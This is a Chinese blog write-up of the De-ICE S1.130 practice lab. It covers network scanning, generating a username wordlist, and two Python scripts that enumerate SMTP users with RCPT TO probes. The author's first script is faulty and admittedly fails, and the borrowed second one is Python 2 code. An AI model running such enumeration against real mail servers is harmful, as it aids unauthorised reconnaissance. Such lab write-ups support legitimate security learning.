De-ICE_S1.130

靶机信息

收集信息

  • 使用netdiscoverimage-20220212063238955
  • nmap -A 192.168.1.20image-20220212063600042

还让匿名登录但是没有获取到东西,受到了欺骗,无法连接并看不到里面有什么东西,看看网址吧

  • dirsearch -u 192.168.1.20 image-20220212064503074

看着没有太多东西,感觉要去查攻略了。

image-20220212064709406 一下就维护,肯定是要倒闭了。获得一个电话一个邮箱地址。

没有一点想法,查看攻略使用customerserviceadmin,生成字典然后验证是否存在该用户image-20220212103331317

pyhton进行分段生成字典,因为permutations的r参数不能迭代,只能手动进行修改。

1
2
3
4
5
6
7
import itertools

life = open('D:/桌面/221.txt','a+')
for i in itertools.permutations(['customer','c','service','s','admin','a','administrator'],7):
life.write(''.join(i)+'\n')
print(''.join(i))
life.close()

然后靶机开放SMTP攻略的想法是使用python,进行smtp用户名在返回的 SMTP 服务扩展集合中则返回true,验证是否存在。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import smtplib


file = open("/home/kali/桌面/221.txt")
while 1:

lines = file.readlines(100000)
if not lines:
print("no")
break
for line in lines:
a = smtplib.SMTP()
a.connect("192.168.1.20","25")
if a.ehlo('csadmin')==1:
print(line)
print("yes")
break
else:
a.quit()
file.close()

然后改代码失效,并没有验证出谁存在,然后查看攻略发现使用别人使用的套接字,完全想错了。查看别人的代码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import socket
import sys

filename = sys.argv[2]
with open(filename) as f:
users = [line.strip() for line in f.readlines() if line]

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 25))
fn = s.makefile('rwb')

fn.readline()
fn.write('mail from: kali@slax.example.net \r\n')
fn.flush()
fn.readline()

for user in users:
fn.write('rcpt to: %s\r\n' % user)
fn.flush()
print '%s: %s' % (user, fn.readline().strip())

fn.write('QUIT\r\n')
fn.flush()
s.close()

总结

Nikto

wc

smtp

cupp

套接字

scoket

io流

python

------ 本文结束------